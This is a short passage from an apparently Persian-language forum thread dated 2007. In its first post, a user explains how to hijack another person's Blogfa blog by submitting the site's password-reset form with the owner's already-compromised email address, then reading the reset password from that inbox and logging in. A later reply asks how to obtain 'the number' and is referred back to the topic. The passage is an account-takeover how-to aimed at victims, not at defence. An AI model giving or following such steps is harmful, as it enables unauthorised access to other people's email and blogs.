چطور؟ حالا میگم . ما فرض بر این داریم که وبلاگی که میخوایم هکش کنیم از بلاگفا میباشد حال به سایت بلاگفا میریم و بر روی (کلمه عبور خود را فراموش کرده ام) کلیک کنید یه صحفه براتون باز میشه که 2 باکس داره شما در اولی آدرس وبلاگو بدید و در باکس دومی ایمیل طرف رو بدید حالا دکمه رو بزنید به همین راحتی پاسورد وبلاگ برا اون ایمیلی که هک کردین میآد و شما با ورود به اون ایمیل میتونید پاسورد رو خونده و حالا به وبلاگ لاگین کنید و هر کاری دوست داشتید بکنید
Saturday 31 March 2007, 06:08
بابا بگین چه جوری شماره رو گیر میاریم
Saturday 31 March 2007, 06:18
ho3in نوشته شده توسط:بابا بگین چه جوری شماره رو گیر میاریم
به تاپیک مراجعه کنید.